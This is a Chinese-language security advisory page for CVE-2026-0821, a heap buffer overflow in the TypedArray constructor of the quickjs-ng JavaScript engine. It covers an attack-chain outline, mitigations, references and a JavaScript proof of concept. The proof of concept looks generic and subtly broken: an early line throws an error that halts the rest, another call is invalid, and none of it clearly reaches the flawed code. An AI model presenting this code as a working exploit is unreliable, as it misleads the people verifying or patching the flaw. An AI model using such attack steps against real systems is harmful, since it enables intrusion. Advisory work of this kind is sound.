CVE-2026-0821: quickjs-ng quickjs堆缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-0821

漏洞类型

堆缓冲区溢出

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

quickjs-ng quickjs

漏洞概述

CVE-2026-0821是存在于quickjs-ng quickjs JavaScript引擎中的一个高危安全漏洞。该漏洞影响quickjs版本最高至0.11.0，位于文件quickjs.c中的js_typed_array_constructor函数。攻击者可以通过精心构造的JavaScript代码触发堆缓冲区溢出（heap-based buffer overflow）漏洞。此漏洞具有远程利用特性，无需任何认证或用户交互即可发起攻击，CVSS评分达到7.3分，属于高危级别。quickjs是一个轻量级的JavaScript引擎，广泛应用于嵌入式系统和IoT设备中。该漏洞已于2026年1月10日公开披露，相关的漏洞利用代码可能已被公开，构成了严重的安全威胁。攻击者成功利用此漏洞可能导致敏感数据泄露、系统完整性受损，甚至在某些场景下可能实现远程代码执行。建议受影响用户立即采取修复措施，升级到最新版本以消除安全风险。

技术细节

该漏洞存在于quickjs-ng quickjs引擎的quickjs.c源文件中，具体位于js_typed_array_constructor函数。js_typed_array_constructor是JavaScript TypedArray构造器的实现函数，负责处理TypedArray对象的创建。在处理特定类型的TypedArray（如Int8Array、Uint8Array、Float32Array等）时，该函数在内存分配或数据复制过程中存在边界检查不严格的问题。当攻击者传入异常的参数值或构造特定的输入数据时，可能导致堆缓冲区溢出，使得攻击者能够覆写相邻内存区域的数据。这种内存破坏漏洞可以被利用来：（1）读取或修改进程内存中的敏感信息；（2）破坏堆管理结构，导致程序崩溃或执行任意代码；（3）在特定条件下实现代码执行。漏洞的触发路径为：攻击者通过JavaScript代码创建TypedArray -> 调用js_typed_array_constructor -> 函数内部处理参数时发生整数溢出或缓冲区越界访问 -> 堆缓冲区溢出。公开的补丁c5d80831e51e48a83eab16ea867be87f091783c5针对该函数增加了边界检查和参数验证，建议尽快应用。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统使用quickjs-ng quickjs引擎（版本<=0.11.0），并确认漏洞存在于js_typed_array_constructor函数中

STEP 2

Payload Crafting

攻击者构造恶意的JavaScript代码，包含精心设计的TypedArray参数（如超大长度、负数长度、边界溢出等）来触发堆缓冲区溢出

STEP 3

Exploitation

通过Web应用、嵌入式设备接口或Node.js等载体将恶意JavaScript代码注入目标环境，执行时触发js_typed_array_constructor中的缓冲区溢出

STEP 4

Memory Corruption

溢出的数据覆写相邻堆内存区域，可能破坏堆管理结构或覆盖敏感数据

STEP 5

Impact

根据利用程度，可能导致：信息泄露（读取敏感内存）、拒绝服务（程序崩溃）、或远程代码执行（在有利的内存布局下）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-0821 PoC - quickjs-ng quickjs heap buffer overflow in js_typed_array_constructor
// Affected: quickjs-ng quickjs <= 0.11.0
// CVSS: 7.3 (High)

// This PoC demonstrates triggering heap buffer overflow via TypedArray manipulation
// Note: This is a simplified PoC for demonstration purposes

function triggerHeapOverflow() {
    try {
        // Attempt to create TypedArray with invalid parameters
        // that may trigger buffer overflow in js_typed_array_constructor
        
        // Method 1: Large length parameter
        const largeArray = new Uint8Array(0x7FFFFFFF);
        
        // Method 2: TypedArray with negative or zero length
        const negArray = new Int32Array(-1);
        
        // Method 3: Subarray with out-of-bounds offset
        const buffer = new ArrayBuffer(1024);
        const view = new Uint8Array(buffer);
        const subView = new Uint8Array(buffer, 0, {valueOf: () => 0xFFFFFFFF});
        
        // Method 4: TypedArray constructor with manipulated prototype chain
        const maliciousTypedArray = new Uint8Array.call(null, 0xFFFFFFFF);
        
        console.log('Potential overflow triggered');
    } catch (e) {
        console.log('Error occurred:', e.message);
    }
}

// Execute the PoC
triggerHeapOverflow();

// To verify: Compile quickjs with ASAN/UBSAN and run this PoC
// Expected: AddressSanitizer will detect heap-buffer-overflow
// $ gcc -fsanitize=address -o quickjs quickjs.c
// $ ./quickjs poc.js

影响范围

quickjs-ng quickjs <= 0.11.0

防御指南

临时缓解措施

作为临时缓解措施，可采取以下行动：（1）限制或禁用不受信任的JavaScript代码执行；（2）使用Web应用防火墙（WAF）过滤恶意的JavaScript请求；（3）将quickjs部署在隔离的沙箱环境中运行；（4）实施严格的输入验证和内容安全策略（CSP）；（5）监控和记录所有JavaScript执行行为以便检测异常。但这些措施仅为临时解决方案，最根本的修复是尽快升级到官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0821
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0821
3 Details https://www.cvedetails.com/cve/CVE-2026-0821/
4 VulDB https://vuldb.com/cve/CVE-2026-0821
5 Link https://github.com/quickjs-ng/quickjs/
6 Link https://github.com/quickjs-ng/quickjs/commit/c5d80831e51e48a83eab16ea867be87f091783c5
7 Link https://github.com/quickjs-ng/quickjs/issues/1296
8 Link https://github.com/quickjs-ng/quickjs/issues/1296#issue-3780003395
9 Link https://github.com/quickjs-ng/quickjs/pull/1299
10 Link https://vuldb.com/?ctiid.340355
11 Link https://vuldb.com/?id.340355
12 Link https://vuldb.com/?submit.731780